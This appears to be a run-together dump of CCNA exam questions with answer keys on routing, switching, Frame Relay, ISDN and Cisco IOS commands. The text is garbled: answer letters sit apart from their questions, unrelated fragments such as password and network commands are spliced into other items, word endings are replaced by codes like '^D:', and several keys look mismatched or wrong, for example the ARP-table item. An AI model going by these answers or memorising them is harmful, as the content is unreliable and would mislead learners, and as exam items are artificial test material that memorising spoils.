^A: hub ^B: repeater ^C: switch ^D: bridge ^E: router ^F: media converter C #CCNA Q. 216 Which type of LAN segmentation device enables high-speed data exchange? ^A: Hub ^B: Bridge ^C: Switch ^D: Repeater A #CCNA Q. 288 A user issues the command ping 204.211.38.52. Which of the following physical is used to test physical connectivity between the two devices? ^A: ICMP echo request ^B: Information request ^C: timestamp reply ^D: redirect ^E: source quench C,E,F #CCNA Q. 244 Which of the following are options for Frame Relay lmi types? (Choose three) ^A: IETF ^B: Q931 ^C: Q933A ^D: IEEE ^E: CISCO ^F: ANSI B,C #CCNA Q. 253 Which of the following statements describe the codes displayed in the show ip route command? (Choose two.) ^A: I-Indicates a route was learned through an Internal protocol. ^B: S-Indicates a route was learned through static comman^D: ^C: R-Indicates a route was learned through RIP ^D: .S-Indicates a route was learned through a serial port. ^E: R-Indicates a route was learned through a reliable port. the testing application. A #CCNA Q. 211 What is the result of using hierarchical addressing framework? ^A: Increase availability of addresses. ^B: Decrease distance between routers. ^C: Increase router memory requirements. ^D: No need to maintain routing information. B #CCNA Q. 55 What must you do to test connectivity on a dial-on-demand routing (DDR) link? ^A: Increase the idle timeout parameter. ^B: Send interesting traffic across the link. ^C: Reboot one of the Integrated Services Digital Network (ISDN) routers. ^D: Reset the DDR Integrated Services Digital Network (ISDN) router statistics to zero. B,C,E #CCNA Q. 21 What are the effects of sustained, heavy collisions in CSMA/CD LANs? (Choose three) ^A: Increased broadcast traffic ^B: Delay ^C: Low throughput ^D: High throughput ^E: Congestion ^F: Higher bandwidth B #CCNA Q. 286 What must you do to test connectivity on a dial on demand routing (DDR) link? ^A: Increate the idle import parameter ^B: Send interesting traffic across the link ^C: Switch ^D: Repeater B #CCNA Q. 287 You got a new testing application on a new server in your office. This testing application work with a few hosts. The new server and hosts work with 10 Mbps and make a bandwidth problem for all the rest nontesting hosts. The rest of the hosts in your office network with 2 Mbps. What is the most economical decision would you implement for resolving this problem? ^A: Install new 100 Mbps switches, and change all host's NIC to 100 Mbps. ^B: Segment network with router, and place all testing hosts and the new server into a separate subnet (network). ^C: Add a Bridge and separate the two networks A #CCNA Q. 282 What output interface status would you see if peer interface (on second end of link) is administratively down? ^A: interface is down, line protocol is down ^B: interface is down, line protocol is up ^C: interface is up, line protocol is down ^D: interface is up, line protocol is up A #CCNA Q. 91 Which command specifies a second subinterface on serial interface zero? ^A: interface s 0.2 point - to point ^B: interface 2 s 0 point to point ^C: sub interface 2 s 0 point to point ^D: interface 0 sub 2 point to point ^E: interface s 0.1 point to point sub 2 C #CCNA Q. 156 What is the connection-oriented protocol in the TCP/IP protocol stack? ^A: IP ^B: UDP ^C: TCP ^D: DNS ^E: OSPF D #CCNA Q. 212 What is the link state routing protocol in the TCP/IP protocol stack? ^A: IP ^B: IS-IS ^C: NLSP ^D: OSPF ^E: RIP ver 2 D #CCNA Q. 148 Which encapsulation methods are most commonly used with dialup integrated services Digital Network (ISDN)? ^A: IP and IPX ^B: IP and PPP ^C: PPP and SDLC ^D: PPP and HDLC B,D #CCNA Q. 93 Which two statements accurately define IP addressing rules? (Choose Two) ^A: IP multicast addresses start with 240 ^B: A host portion of all 1\rquote s indicates a network broadcast ^C: The value of zero (0) in the host portion means \ldblquote all hosts\rdblquote on the network ^D: IP addresses are four octets long and contain a network portion and a host portion A,C,E #CCNA Q. 82 Which three statements about common elements of the TCP/IP protocol stack are true? (Choose three) ^A: IP provides connection less service and routing capabilities. ^B: ARP enables devices to locate the IP address of local devices. ^C: UDP provides simple connection less service without windowing or acknowledgements. ^D: ICMP provides connection oriented management data to routers and layer three switches. ^E: TCP enables devices to send large quantities of data using switching in a connection-oriented manner. A #CCNA Q. 206 What is the protocol and what is the second part of the following network address? 255255255255 ^A: IP, a flooded broadcast ^B: IP, a directed broadcast ^C: IPX, a flooded broadcast ^D: IPX, a remote directed broadcast C #CCNA Q. 161 When you configure an IP address on a Cisco Router, which command starts the IP processing on the interface? ^A: IP-Space enable ^B: Network IP-Address ^C: IP address IP-address subnet mask. ^D: The exit command from the enable configuration ^E: Copy running-configuration to startup-configuration C #CCNA Q. 291 Given an IPX network with redundant paths, what command will configure load balancing? ^A: ipx load-balance ^B: ip maximum-paths 2 ^C: ip maximum-paths 2 ^D: ipx load-share C #CCNA Q. 283 What is the protocol and what is the second part of the following network address? (Choose all that apply.) 172.161.0.254 mask 255.255.0.0 ^A: IPX MAX address ^B: IP Class C director broadcast ^C: Private IP address node number ^D: Public IP address directed broadcast ^E: Private IP address directed broadcast C #CCNA Q. 70 What is the protocol and what is the second part of the following network addresses 172.16.0.254 , mask=255.255.0.0? ^A: IPX:MAC addresses. ^B: IP:classC directed broadcast. ^C: Private IP address:node number ^D: Public IP addresses:directed broadcast. ^E: Private IP addresses directed broadcast. A #CCNA Q. 310 Which of the following WAN services use two data link layer encapsulations, one for data and one for signaling? ^A: ISDN ^B: Frame Relay ^C: ATM ^D: FDDI B #CCNA Q. 4 Which IOS command is used to associate an ISDN phone number with the next hop router address? ^A: isdn destination number ^B: dialer map ^C: isdn spid1 ^D: isdn line number ^D: That a bridge be placed between the enterprise server and all other users with the exception of B,C #CCNA Q. 119 Which two statements about integrated services digital network (ISDN) are true? (Choose two) ^A: ISDN provides only data only capability. ^B: ISDN provides an integrated voice/data capability. ^C: The ISDN standards define the hardware and call setup schemes for end-to-end digital connectivity. ^D: Users receive more bandwidth on WANs with a leased line of 56kbps than with multiple b channels. A #CCNA Q. 22 Modem networks are often described as using 100Base-TX components. What is meant by the term Base' in this definition? ^A: It describes the signaling method for communication on the network. ^B: It refers to the type of media used in the network. ^C: It relates to the speed of transmission of network signals. ^D: It defines the allowable length of media that can be use^D: ^E: It defines half-duplex or full-duplex operation. C,D #CCNA Q. 54 What are two characteristics of the RARP protocol? (Choose two.) ^A: It generates parameter problem messages. ^B: It maps IP addresses to Ethernet addresses. ^C: It maps Ethernet addresses to IP addresses. ^D: It is implemented directly on top of the data link layer. A #CCNA Q. 52 What is a benefit of a virtual LAN (VLAN)? ^A: It increases the number of broadcast domains. ^B: It decreases the number of broadcast domains. ^C: It increases the number of collision domains. ^D: It decreases the number of collision domains. ^E: Since it is a virtual interface, it never shuts down. A #CCNA Q. 14 What is the result of segmenting a network with a bridge? ^A: It increases the number of collision domains. ^B: It decreases the number of collision domains. ^C: It increases the number of broadcast domains. ^D: It decreases the number of broadcast domains. D #CCNA Q. 75 What is the result of segmenting a network with a router into segments 1 and 2? ^A: It increases the number of collisions. ^B: It decreases the number of broadcast domains. ^C: It connects segment one\rquote s broadcast to segment two. ^D: It prevents segment one\rquote s broadcast from getting to segment two. B,E #CCNA Q. 192 Assuming no subnetting, which two pieces of information can be derived from the IP address 144.132.25.10? (Choose Two) ^A: It is a Class C address ^B: It is a Class B address ^C: The network address is 144.0.0.0 ^D: The network address is 144.132.25.0 ^E: The host portion of the address is 25.10 A #CCNA Q. 164 Which statement about the data-link connection identifier (DLCI) is true? ^A: It is a number that identifies a local virtual circuit in Frame Relay network. ^B: It is a signaling standard between the CPE device and the Frame Relay switch. ^C: It is check speed port speed of the connection (local loop) to the Frame Relay clou^D: ^D: It is maximum number of uncommitted bits that the Frame Relay switch will attempt to transfer beyond the committed information rate (CIR). A #CCNA Q. 47 Which of the following are not true of standard half-duplex Ethernet circuitry? ^A: It is alternate one-way communication. ^B: The receive (RX) is wired directly to the transmit (TX) of the remote station. ^C: The receive (TX) is wired directly to the receive (RX) of the remote station. ^D: Collisions are not possible. ^E: Both stations can transmit simultaneously. C #CCNA Q. 126 What is a backoff on an 802.3 network? ^A: It is latency in store and forward switchin^G: ^B: It is the time used for token passing for machine to machine. ^C: It is the retransmission delay that is reinforced when a collision occurs. ^D: It is the result of two nodes transmitting at a same time the frames from each transmitting device collide and are damage^D: C #CCNA Q. 189 What is back off on an 802.3 network? ^A: It is latency stored and forward switchin^G: ^B: It is the time used to token passing from machine to machine. ^C: It is re transmission delay that is encountered when a collision occurs. ^D: It the result of two nodes transmitting at the same time the frames from each transmitting device collide and are damage^D: D #CCNA Q. 138 What are the characteristics of UDP? ^A: It is reliable and acknowledged ^B: It is unreliable and acknowledged ^C: It is reliable and unacknowledged ^D: It is unreliable and unacknowledged A #CCNA Q. 72 Which statement about the Committed Information Rate (CIR) is true? ^A: It is the rate, in bits per second, at which the Frame Relay switch agrees to transfer data ^B: It is the clock speed (port speed) of the connection (local loop) to the Frame Relay cloud ^C: It is the maximum number of bits that the switch can transfer during any Committed Rate Measurement Interval ^D: It is a signaling standard between the CPE device and the FR switch. It is responsible for managing the connection and maintaining status between the devices. D,F #CCNA Q. 62 Which two statements about IP RIP are true? (Choose two.) ^A: It limits hop counts to 31. ^B: It is a link-state routing protocol. ^C: It uses autonomous system numbers. ^D: It is capable of load sharing over multiple paths. ^E: It uses bandwidth as the metric for path selection. ^F: It broadcasts updates every 30 seconds by defaults B #CCNA Q. 63 How does inter-VLAN communication take place? ^A: It takes place through any Cisco router. ^B: It takes place through a Cisco router than can run ISL. ^C: It takes place through a router, but this disables all the router's Security and filtering functionality for the VLANs. ^D: For nonroutable protocols, (e.g., NetBEUI) the router provides communications between VLAN domains. ^E: Inter-VLAN communications is not possible because each VLAN is a separate broadcast domain. B #CCNA Q. 81 Using the TCP/IP suite a message is sent from host A to a destination IP address on the same LAN. How does host A determine the destination\rquote s MAC address? ^A: It uses a Proxy ARP. ^B: It uses ARP requests. ^C: It uses RARP requests. ^D: It uses router look up table. A,B,C,G #CCNA Q. 74 What are four function/characteristics of the network layer of the OSI model? (Choose four) ^A: It uses a two-part address. ^B: It maintains routing tables. ^C: It uses broadcast addresses. ^D: It establishes network addresses. ^E: It provides access to the LAN medi^A: ^F: It provides media independence for upper layers. ^G: It provides path selection for Internet work communication. B,C #CCNA Q. 233 Which two statements about the store and forward switching method are true? (Choose two) ^A: Latency remains constant regardless of frame size. ^B: Latency through the switch varies with frame length. ^C: The switch receives the complete frame before beginning to forward it. ^D: The switch checks the destination address as soon as it receives the header and begins forwarding the frame immediately. E #CCNA Q. 183 Which command assigns the login password Cisco on the console terminal line? ^A: line vty 0 Log in Password Cisco ^B: Line console Login Password Cisco ^C: Line login terminal Password Cisco ^D: Line console 0 D,E #CCNA Q. 261 Which of the following are used to prevent routing loops in network that use distance vector routing protocols? (Choose two.) ^A: link-state advertisement (ISA ^B: Spanning Tree Protocol ^C: shortest path first tree ^D: split horizon ^E: hold-down timers A,B,E #CCNA Q. 76 Which three basic switch functions increase available bandwidth on the network? (Choose three) ^A: Loop avoidance. ^B: Address learning ^C: Hop count limiting ^D: Broadcast filtering ^E: Packet forward/filterin^G: A,B #CCNA Q. 139 What are the two sublayers of the data link layer? (Choose two) ^A: MAC ^B: LLC ^C: SAP ^D: LCP ^E: NetWare Core Protocol (NCP) A #CCNA Q. 199 You telnet to a host on a remote network. Which MAC address will be present in the ARP table when you issue the show arp command? ^A: MAC address of the destination host Ethernet port. ^B: MAC address of the local router Ethernet port ^C: MAC address of the destination router Serial port ^D: MAC address of the local router Serial Port A,C,D #CCNA Q. 242 Which of the following should be done prior to backing up an IOS image to a network server? (Choose three) ^A: Make sure that the network server can be accesse^D: ^B: Check that the authentication for access is set. ^C: Assure that the network server adequate space for the code image. ^D: Verify any file naming and path requirements. ^E: Make sure that the server can load and run the bootstrap code. B,C #CCNA Q. 285 Which of the following metrics does IGRP use by default to determine the best path to destination? (Choose two.) ^A: Maximum Transmission Unit ^B: Cumalative Interface delay. ^C: Path bandwidth value. ^D: Reliability from source to destination. ^E: Link loading in bits-per-secon^D: ^F: Hold-down timers for updates. A,B,E #CCNA Q. 10 Which devices operate at all seven layers of the OSI model? (Choose three) ^A: Network host ^B: Network management station ^C: Transceiver ^D: Bridge ^E: Web server ^F: Switch A,C #CCNA Q. 135 Which are two ways IPX supports multiple logical networks on an individual interface? (Choose two) ^A: Network number ^B: Routing protocol ^C: Encapsulation type ^D: Autonomous system number C #CCNA Q. 118 What are two components of an IPX address? "^A: Network number; IP address." "^B: MAC address; node number." "^C: Network number; MAC address." "^D: Network number; subnet number." A,C #CCNA Q. 324 Which of the following are generally considered to be characteristics of connectionless network services? (Choose two.) ^A: non-reliable ^B: reliable ^C: less bandwidth-intensive ^D: handshaking B,D #CCNA Q. 246 In contrast to connectionless services, which of the following are generally regarded as characteristics of connection-oriented network services? (Choose two.) ^A: non-reliable ^B: reliable ^C: less bandwidth-intensive ^D: handshaking A,B #CCNA Q. 263 Which of the following need to be modified in the password recovery process? (Choose two.) ^A: nvram ^B: configuration register ^C: boot flash ^D: cmos\'a8 ^E: flash C #CCNA Q. 87 How many collisions are caused by transmitting and receiving frames simultaneously in a full-duplex Ethernet Technology? ^A: One ^B: Two ^C: None ^D: Several C #CCNA Q. 316 Based on the debug output shown, what type of handshake occurred for PPP authentication? ^A: one-way ^B: two-way ^C: three-way ^D: no handshake required during authentication. A #CCNA Q. 231 What is a disadvantage of using a connection-oriented protocol such as TCP? ^A: Packet acknowledgement may add overhead ^B: Packets are not tagged with sequence numbers ^C: Loss or duplication of data packets is more likely to occur ^D: The application layer must assume responsibility for correct sequencing of the data packets. C #CCNA Q. 116 What is an advantage of using a connectionless protocol such as UDP? ^A: Packet acknowledgement may reduce overhead traffi^C: ^B: Loss or duplication of data packets is less likely to occur. ^C: Packets are not acknowledged which reduces overhead traffi^C: ^D: The application relies on the transport layer for sequencing of the data packets. C #CCNA Q. 53 IP RIP routing is configured on a router, but all interfaces attach to RIP network. What should you use to prevent all RIP routing updates from being sent through selected interfaces without using access lists? ^A: Passive route ^B: Default routes ^C: Passive interface ^D: Route update filtering B #CCNA Q. 45 Which of the following commands applies to an access control list to a router interface? ^A: permit access-list 101 out ^B: ip access-groups 101 out ^C: apply access-list 101 out ^D: access-class 101 out ^E: ip access-list e0 out A #CCNA Q. 241 What is the effect of the following access list condition? access.list 101 permit ip 10.25.30.0 0.0.0.255 any ^A: Permit all packets matching the first three octets of the source address to all destinations. ^B: Permit all packets matching the last of the destination address and accept all source address. ^C: Permit all packets from the third subnet of the network address to all destinations. ^D: Permit all packets matching the host bits in the source address to all destinations. ^E: Permit all packets to destination matching the first three octets in the destination address.. F #CCNA Q. 12 At which OSI layer does data translation and code formatting occur? ^A: Physical ^B: Data link ^C: Network ^D: Transport ^E: Session ^F: Presentation A #CCNA Q. 318 Which command sends and receives ICMP echo messages to verify connectivity from host to host? ^A: ping ^B: tracert ^C: netstat ^D: show cdp neighbors details ^E: show ip route ^F: traceroute A,D,F #CCNA Q. 20 Which commands could be used at the command line interface to troubleshoot LAN connectivity problems on a router? (Choose three) ^A: ping ^B: tracert ^C: ipconfig ^D: show ip route ^E: winipcfg B,C #CCNA Q. 295 Which of the following are application layer protocols? (Choose two.) ^A: Ping ^B: Telnet ^C: FTP ^D: TCP ^E: IP A,B #CCNA Q. 26 Which two commands allow you to verify address configuration in your internetwork? ^A: Ping ^B: Trace ^C: Verify ^D: Test IP ^E: Echo IP ^F: Config IP A,D #CCNA Q. 84 Which two protocol tools use ICMP? (Choose two) ^A: Ping ^B: Telnet ^C: Configure ^D: Trace route ^E: Show commands ^F: Standard access list D #CCNA Q. 307 You are unable to telnet to a router at address 203.125.12.1 from a workstation with the IP address of 203.125.12.23. You suspect that there is a problem with your protocol stack. Which of the following actions is most likely to confirm your diagnosis? ^A: ping 127.0.0.0 ^B: ping 203.125.12.1 ^C: telnet 127.0.0.1 ^D: ping 127.0.0.1 ^E: tracert 203.125.12.1 A,B #CCNA Q. 266 What do you use for loop avoidance? (Choose two.) ^A: Poison reverse. ^B: Split horizon. ^C: Link state protocol. A,D #CCNA Q. 143 Which two WAN data link layer protocols support multiple upper layer protocols? (Choose Two) ^A: PPP ^B: LAPD ^C: ISDN ^D: HDLC C #CCNA Q. 147 Which statement about the Point-to-Point protocol (PPP) is true? ^A: PPP supports TCP/IP, but not Novell IPX ^B: PPP is being phased out of existence by the Serial Line Internet protocol ^C: PPP provides router-to-router and host-to-network connections over both synchronous and asynchronous circuits. ^D: PPP is an ITU-T and ANSI standard that defines the process for sending data over a packet-switched data network C,D,E #CCNA Q. 151 What are three benefits of integrated services digital network (ISDN)? (Choose three) ^A: PVCs are faster and more reliable. ^B: No specialized equipment is require^D: ^C: Data transfer is faster than typical modems. ^D: Call setup is faster than with standard telephone service. ^E: It carries many types of data traffic such as voice, video, and dat^A: D #CCNA Q. 298 Which type of router memory normally stores the start-up configuration? ^A: RAM ^B: ROM ^C: FLASH ^D: NVRAM A #CCNA Q. 303 What function does the up arrow key provide within the Cisco router IOS? ^A: Recalls the previous command line. ^B: Moves the cursor one line ip. ^C: Redisplays the current command line. ^D: Capitalize the command line. A,C #CCNA Q. 223 Which two statements about a reliable connection oriented data transfer are true? (Choose two) ^A: Recipients acknowledge receipt of dat^A: ^B: When buffers are filled to capacity, datagrams are discarded and not re transmitted. ^C: Windows are used to control the amount in outstanding acknowledged data segments. ^D: If the segments timer expires between receipt of an acknowledgement the sender drops the connection. ^E: The receiving device waits for acknowledgements from the sending device before accepting more data segments. A,B,F #CCNA Q. 293 Which of the following are associated with the Presentation Layer of the OSI model? (Choose three) ^A: Rich Text Format (RTF) ^B: Quick Time movie ^C: FTP ^D: TFTP ^E: SMTP ^F: MIDI Password CISCO ^E: Line console 0 Login Password Cisco C #CCNA Q. 38 Which of the following protocols utilizes features of both distance-vector and link-state routing? ^A: RIP ^B: OSPF ^C: EIGRP ^D: IGRP B #CCNA Q. 176 Which router component stores routing tables, ARP cache, and packet buffers? ^A: ROM ^B: RAM ^C: NVRAM ^D: Flash memory A #CCNA Q. 162 When you issue the command show version, your router returns: -Configuration register is 0x0101- From where does the router boot? ^A: ROM ^B: NVRAM ^C: FLASH ^D: A TFTP server E #CCNA Q. 109 Which line from a show spantree 1 command output indicates that virtual LAN1 (VLAN1) is functioning properly? ^A: Root port is fast Ethernet 0/26 ^B: Port Ethernet 0/1 of VLAN is forwarding ^C: Designated port is Ethernet 0/1, path cost 10 ^D: Designated root has priority 0 address 00D0.588^F:B600 ^E: VLAN is executing the IEEE compatible spanning tree protocol. B #CCNA Q. 80 What is a function of a reliable transport layer connections. ^A: Route selection ^B: Acknowledgement ^C: Session checkpoints ^D: System authentication E,F,G #CCNA Q. 207 Which three protocols exactly match their transport layer functions? (Choose three) ^A: Route selection-IP ^B: Sliding window-UDP ^C: Well known ports-IP ^D: Route validation-ICMP ^E: Connection oriented-TCP/IP ^F: Three way handshake TCP/IP ^G: No acknowledgement-UDP A #CCNA Q. 89 Which commands should you use to enable IGRP routing? ^A: router igrp 100 network 192.168.1.0 network 10.0.0.0 ^B: router igrp 100 network 192.168.1.0 network 10.2.0.0 ^C: router igrp 100 network 192.168.1.0 192.168.1.1 network 10.2.0.0 10.2.1.1 D #CCNA Q. 301 Rachel is adding a balanced hybrid routing protocol to her network. Which of the following commands would she use to start the routing process? ^A: router rip ^B: router igrp 100 ^C: router ospf 1 ^D: router eigrp 100 B #CCNA Q. 227 Which command would you use to enable IP RIP version 1 on a router? ^A: Router RIP network 172.16.1.0 network 10.1.0.1 ^B: Router RIP network 172.16.0.0 network 10.0.0.0 ^C: Router RIP network 172.16.1.0 172.16.1.1 network 10.1.0.0 10.1.1.1 D #CCNA Q. 120 Which prompt and command combination sets RIP as the routing protocol? ^A: Router# rip. ^B: Router rip. ^C: Router (Config)# rip. ^D: Router (Config)# router rip. C #CCNA Q. 98 Which router command allows you to view the entire contents of all access lists? ^A: Router# show interface ^B: Router> show IP interface ^C: Router# show access-list ^D: Router> show all access list A #CCNA Q. 97 Which router command allows you to determine if an IP access list is enabled on a particular interface? ^A: Router# show ip interface ^B: Router> show access-list ^C: Router# show ip access-list ^D: Router> show interface ip access-list B #CCNA Q. 65 Which configuration mode and command combination sets the bandwidth metric of a Frame Relay connection? ^A: router(Config)# clock rate 56 ^B: router(Config-if)# bandwidth 56 ^C: router(Config)# bandwidth 56000 ^D: router(Config-if)# clock rate 56000 C #CCNA Q. 202 Which command sets IGRP as the routing protocol for autonomous system 100? ^A: Router(config)# igrp 100 ^B: Router(config)# network 100 ^C: Router(config)# router igrp 100 ^D: Router(config)# enable igrp 100 ^E: Access List 101 deny IP 128.12.22.55 TCP EQ 20 21 23 A #CCNA Q. 289 "How do you change the Console password to """"cisco""""? """ ^A: Router(config)# line con 0 Router(config-line)# login Router(config-line)# password cisco ^B: Router(config)# line con 0 Router(config-line)# login Router(config-line)# password Cisco D #CCNA Q. 144 Which command enables directly connected network 199.55.72.0 to be used by RIP? ^A: Router(Config)# rip 199.55.0.0 ^B: Router(Config-router)# rip 199.55.72.0 ^C: Router(Config-router)# network 199.55.0.0 ^D: Router(Config-router)# network 199.55.72.0 C #CCNA Q. 312 Which command correctly configures an IP address on a Cisco router interface? ^A: router(config-if)# ip address 172.18.32.1 subnet mask 255.255.252.0 ^B: router(config-if)# 172.18.32.1 255.255.252.0 ^C: router(config-if)# ip address 172.18.32.1 255.255.252.0 ^D: router(config-if)# 255.255.252.0 subnet mask 255.255.252.0 ^E: router(config-if)# ip address 172.18.32.1/22 ^F: router(config-if)# ip address 172.18.32.1 subnet mask /22 B #CCNA Q. 85 Which command successfully ping an individual IP address? ^A: Router>ping 192.5.5.0 ^B: Router# ping 192.5.5.30 ^C: Router> ping 192.5.5.256 ^D: Router# ping 192.5.5.255 Answer: B D #CCNA Q. 170 Which encapsulation type should be used for the e1 port of Router R3? ^A: SAP ^B: HDLC ^C: ARPA ^D: Novell-Ether B #CCNA Q. 111 Which encapsulation type should be used for the S0 port of Router R2? ^A: SAP ^B: HDLC ^C: ARP ^D: NOVELLETHER B #CCNA Q. 169 Which encapsulation type should be used for the S0 port of router R2? ^A: SAP ^B: HDLC ^C: ARPA ^D: Novel Ether D #CCNA Q. 60 Which show interface serial 1 status statement indicates that the shutdown command was issued on that interface? ^A: Serial 1 is up, line protocol is up. ^B: Serial 1 is up, line protocol is down. ^C: Serial 1 is down, line protocol is down. ^D: Serial 1 is administratively down, the line protocol is down. C #CCNA Q. 302 Which command must be entered when connecting two routers without external DCE devices via a serial linl? ^A: serial up ^B: line protocol up ^C: clock rate ^D: dce rate ^E: dte rate B #CCNA Q. 133 At which layer of the OSI model does the ping command operate? ^A: Session ^B: Network ^C: Transport ^D: Maintenance network 172.16.1.0 265.255.255.0 Network 10.1.0.0 255.255.0.0 B #CCNA Q. 104 If you are in IOS user mode which command do you use to enter the privileged mode? ^A: Set ^B: Enable ^C: Configure ^D: Privileges A #CCNA Q. 127 You have just issued an erase startup-config command and reloaded your router. In which mode will your router be when you reboot? your router be when you reboot? ^A: Setup. ^B: Startup. ^C: User EXE^C: ^D: User privilege^D: ^E: Global configuration. A,D #CCNA Q. 23 Which of the following are unique characteristics of half-duplex Ethernet as compared to full-duplex Ethernet? (Choose two.) ^A: Shared collision domain. ^B: Private collision domain ^C: Higher effective throughput ^D: Lower effective throughput ^E: Private broadcast domain C #CCNA Q. 44 Which command is used to display the placement and direction of an IP access control list on a router? ^A: show access-list ^B: show ip route ^C: show ip interface ^D: show interface ^E: show interface list A #CCNA Q. 191 Which command displays access list 111? ^A: Show access-list 111 ^B: Show IP access list 111 ^C: Display IP address list 111 ^D: Display access-list 111 details D #CCNA Q. 167 Which ex command displays system configuration information, software version and the names and sources of configuration files and boot images on a router? ^A: show boot ^B: show flash ^C: show Config ^D: show version B #CCNA Q. 159 Which command displays the interfaces using a given access list? ^A: Show filters ^B: Show IP interface ^C: Show active list ^D: Show interface parameters ^E: Configure IP access list ^F: Show access-list interfaces Login B,C #CCNA Q. 146 Which two commands show your access lists? (Choose two) ^A: Show filters. ^B: Show access-lists ^C: Show IP access-list ^D: Show running-Config E #CCNA Q. 137 In Cisco IOS software, which command displays the backup configuration? ^A: show flash ^B: show version ^C: show tftp-config ^D: show backup-config ^E: show startup-config B,D #CCNA Q. 269 Which commands will allow you to identify the local dlci number? (Choose two.) ^A: show frame-relay local-dlci ^B: show frame-relay pvc ^C: show frame-relay dlci ^D: show frame-relay map ^E: show ip route A #CCNA Q. 132 Which command displays the IP addresses assigned to specific host names? ^A: show hosts ^B: show interface ^C: ping host name ^D: config host name ^E: show host mapping ^F: show host name IP address ^G: trace IP addresses host name A #CCNA Q. 160 You have a Frame Relay Link on serial1. Which command displays the Local Management Interface (LMI), data link connection identifier (DLCI), and bandwidth for that link? ^A: show interface serial1 ^B: show frame-relay serial1 ^C: show protocol frame-relay serial1 ^D: show serial1 encapsulation frame-relay B #CCNA Q. 129 Which command verifies encapsulation as well as layer 1 and layer 2 statistics on a router configured for Frame Relay? ^A: show IP ^B: show interface ^C: show statistics ^D: show frame-relay C #CCNA Q. 43 Which command will provide you with information regarding the Layer 3 configuration of directly connected router interfaces? ^A: show ip interface ^B: show cdb neighbors ^C: show cdp neighbors detail ^D: show ip route ^E: show ip link status B,C #CCNA Q. 150 Your network is having IP problems connecting to one or more Frame Relay peer routers. Which two commands should you use to show the routers that are reachable? (Choose two) ^A: show IP map ^B: show IP route ^C: show frame-relay map ^D: debug frame-relay map C #CCNA Q. 300 Which commands displays RIP routing updates as they are sent and received by the router? ^A: show ip protocols ^B: show ip route rip ^C: debug ip rip ^D: debug ip updates ^E: debug ip transactions B #CCNA Q. 88 Which Cisco IOS command should you use to display the Novel IPX address assignments on a router? ^A: Show IPX addresses. ^B: Show IPX interface. ^C: IPX network ^D: Display IPX addresses ^E: Show IPX routing details E #CCNA Q. 90 Which show command should you use to view Frame Relay local management interface (LMI) traffic statistics? ^A: show lmi ^B: show ip route ^C: show interface ^D: show statistics ^E: show frame-relay lmi D #CCNA Q. 28 Which command displays all routed protocols and the interfaces on which the protocol is enabled? ^A: show protocols ^B: show protocol brief ^C: show interfaces protocol ^D: show interfaces ^E: show routed ^F: show routed interfaces D #CCNA Q. 2 Which command displays the configuration register setting? ^A: show register ^B: show flash ^C: show boot this IOS command displays the settings of the boot environment variables ^D: show version A #CCNA Q. 214 What is an advantage of local area network LAN segmentation? ^A: Smaller collision domains. ^B: Elimination of broadcast. ^C: Decrease cost of implementation. ^D: Larger number of users within the same domain. A,D #CCNA Q. 67 In order to enable RIP which two tasks need to be performed? (Choose two) ^A: Specify the routing protocol. ^B: Configure static Rip routes. ^C: Specify directly connected subnets. ^D: Specify directly connected networks. A,B #CCNA Q. 177 Which two solutions are used to reduce the chance of distance vector routing loops. (Choose two) ^A: Split horizon ^B: Route Poison ^C: Area Hierarchies ^D: Link State Algorithms A,C #CCNA Q. 140 Which two types of route table entries does a Layer3 router to determine the appropriate path to a destination use? (Choose two) ^A: Static route entry ^B: Default route entry ^C: Dynamic route entry ^D: Temporary route entry ^E: Permanent route entry A #CCNA Q. 260 What type of switching create variable latency through the switch? ^A: Store-and-forward ^B: Cut-through ^C: Fragment-free B #CCNA Q. 256 In what switch mode read first part of frame with destination address and send frame immediately? ^A: Store-and-forward ^B: Cut-through ^C: Fragment-free C #CCNA Q. 11 With the hierarchical numbering of IP addresses what determines the portion of the address that will identify the network number? ^A: Subnet Mask ^B: Dots between octets ^C: Class of first octet ^D: Assignments of DHCP ^E: Address Resolution Protocol A,B,E #CCNA Q. 276 Which connection allows the use of full-duplex Ethernet? (Choose three) ^A: Switch to host. ^B: Switch to switch. ^C: Hub to hu^B: ^D: Switch to hu^B: ^E: To host. A,B #CCNA Q. 236 Full Duplex Ethernet can operate between which of the following devices? (Choose two.) ^A: Switch to host. ^B: Switch to switch. ^C: Hub to hu^B: ^D: Switch to hu^B: ^E: Hub to host. B,D,F #CCNA Q. 17 Which of the following statements are true regarding bridges and switches? (Choose three) ^A: Switches are primarily software based while bridges are hardware base^D: ^B: Both bridges and switches forward Layer 2 broadcasts. ^C: Bridges are frequently faster than switches. ^D: Switches have a higher number of ports than most bridges. ^E: Bridges define broadcast domains while switches define collision domains. ^F: Both bridges and switches make forwarding decisions based on Layer 2 addresses. B #CCNA Q. 218 Which statement about switched and routed data flow is correct? ^A: Switches create a single collision domain and a single broadcast domain. Routers provide separate broadcast domains. ^B: Switches create separate collision domains but a single broadcast domain. Routers provide a separate broadcast domains. ^C: Switches create a single collision domain and a separate broadcast domain. Router provides a separate broadcast domain as well. ^D: Switches create separate collision domains and separate broadcast domains. Routers provide separate collision domains. D #CCNA Q. 172 Which statement about Ethernet switches is true? ^A: Symmetric switching allows connection between ports of unlike bandwidth and does not require memory bufferin^G: ^B: Memory buffering is used to prevent a bottleneck when ports of different bandwidth are connected on a symmetric switch. ^C: The latency can be reduced if the switch utilizes the store and forward method of switchin^G: Store and forward is better for error detection. ^D: The cut-trough method of switching is faster because the switch forwards the packet to the destination as soon as it reads the destination address. D #CCNA Q. 201 Which statement about the flow control function of TCP is True? ^A: TCP makes no effort to check for lost or duplicate data packets. ^B: The application layer must sequence data packets when using TCP. ^C: TCP controls the flow of UDP data through negative acknowledgements NAK. ^D: TCP is a connection-oriented protocol that acknowledges receipt of data packets and is considered reliable B #CCNA Q. 99 Which statement about Ethernet networks is true? ^A: The advantage of a full duplex is the ability to transmit data over Mbase2 cable. ^B: Full duplex Ethernet requires a point-to-point connection when only two nodes are present. ^C: Ethernet switches can use full duplex mode to connect multiple nodes to a single port of a switch. ^D: Half duplex is a cut through packet processing method that is very fast with little error correction, full duplex is store and forward method that is slower but has better error correction. A #CCNA Q. 296 Hosts in the Sales Department are unable to access a new server at the remote office. Consider the IP addressing scheme in the accompanying graphic to determine the problem. ^A: The default gateway of the workstations in the sales department is incorrect. ^B: The subnet mask of the workstations in the sales department in incorrect. ^C: The default gateway of the server at the Remote Office is incorrect. ^D: The host address of the server at the Remote Office is invali^D: ^E: The serial 0 interface on the Home Office router and the serial 1 interface on the Remote Office router are not on the same subnetwork. ^D: Router RIP E #CCNA Q. 51 Which of the following are true? ^A: The default is to send debug output to the console screen. "^B: To view debug 